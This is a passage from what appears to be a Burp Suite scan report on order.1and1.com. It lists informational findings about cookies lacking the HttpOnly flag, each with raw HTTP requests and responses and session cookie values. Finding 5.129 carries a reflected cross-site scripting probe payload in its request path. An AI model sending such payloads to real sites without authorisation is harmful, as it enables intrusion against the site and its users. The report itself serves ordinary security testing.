Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:36 GMT; Path=/
ETag: 5bfc66b9517d399c2c12a418498321d1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25381


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.122. http://order.1and1.com/xml/order/MailXchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailXchange HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:24:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=786f94fc96f1d800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MailXchange;jsessionid=96240D18BB57256D1CB11B0EC7E7B897.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.123. http://order.1and1.com/xml/order/MailXchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:52 GMT; Path=/
ETag: 80d79fb7f81c76e6606c17b109cfe0c5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24474


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.124. http://order.1and1.com/xml/order/MicrosoftExchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MicrosoftExchange HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:24:49 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3ab11e06d79b6c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MicrosoftExchange;jsessionid=92D951397703AF6BB4EB37A053C0817D.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.125. http://order.1and1.com/xml/order/MicrosoftExchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MicrosoftExchange

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:25:20 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:39:27 GMT; Path=/
ETag: 99e72a9f4366afaae938dfca2d6367b6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26758


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.126. http://order.1and1.com/xml/order/Moneyback

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Moneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Moneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:37:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:51:59 GMT; Path=/
ETag: 68815fe823ebc876487b28a0df9b9810
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15902


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.127. http://order.1and1.com/xml/order/Moneyback

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Moneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Moneyback HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:37:43 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=62ccfd6dea1ab800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Moneyback;jsessionid=E0197E0A08B7E3EE887DD1789AA270BA.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.128. http://order.1and1.com/xml/order/MsHosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:55:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=kcmc3OjsxWlpaVGddZCpiXCkbJXVoYjpRRD4mKicnJiQmJCEhJCMdICQXMC8uK1A+al9hbycpJFQtV2YsHyAcGyAzMTQyLDQrKjNrbDIlLl5nLSAhHRwhHTI1My01LCs=; Expires=Fri, 07-Apr-2079 18:09:49 GMT; Path=/
ETag: b67acb7c15edd14e68367a76bb0bfc39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59574


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.129. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://burp/show/16
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCoeJlZ2PC8wLCswLSosJiYkJig=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:5:AAABLtRV*lKZz6xm29DD7n8Tbz9KytaA:1300642527826; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:36:09 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1bedc423003cf400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e;jsessionid=017875AF4FDBD39645191C205A94077D.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail
Content-Length: 0
Content-Type: text/plain


5.130. http://order.1and1.com/xml/order/Mshosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mshosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/Mshosting HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=3c94c49b88c62400; UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0jKVliKBszLy4zMC0wMSstKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:12:AAABLtRYsR8sOtfROdrX6nNd8dbBxzhJ:1300642705695; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:39:32 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=56a1c9b59ccfc800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/Mshosting;jsessionid=01D155683593BC8236955C8C848B8849.TCpfix142a
Content-Length: 0
Content-Type: text/plain


5.131. http://order.1and1.com/xml/order/News

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/News HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:38:14 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1077e08166155000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/News;jsessionid=41B0847EFB4C20EDB1DB4A5689CF983B.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.132. http://order.1and1.com/xml/order/News

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.133. http://order.1and1.com/xml/order/PrivacyPolicy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/PrivacyPolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:36:30 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3cad72d7db6a8800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/PrivacyPolicy;jsessionid=1B10F35FFB9A21D430ADF28D0838D7F0.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.134. http://order.1and1.com/xml/order/PrivacyPolicy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

